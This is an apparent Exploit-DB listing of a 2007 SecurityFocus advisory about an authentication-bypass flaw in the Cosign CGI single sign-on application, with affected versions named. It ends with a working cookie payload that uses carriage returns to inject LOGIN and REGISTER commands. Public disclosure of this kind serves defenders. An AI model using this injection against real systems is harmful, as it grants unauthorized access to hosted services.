Cosign 2.0.1/2.9.4a - CGI Check Cookie Command Remote Authentication Bypass

EDB-ID:

29842


Platform:

CGI

Published:

2007-04-11

source: http://www.securityfocus.com/bid/23422/info

The 'cosign' application is prone to an authentication-bypass vulnerability because it fails to adequately sanitize user-supplied input.

An attacker can exploit this issue to gain unauthorized access to services hosted on an affected computer.

Versions prior to 1.9.4b and 2.0.2a are vulnerable. 

cosign=X\rLOGIN cosign=X 1.2.3.4 username\rREGISTER cosign=X 1.2.3.4 cosign-servicename=Y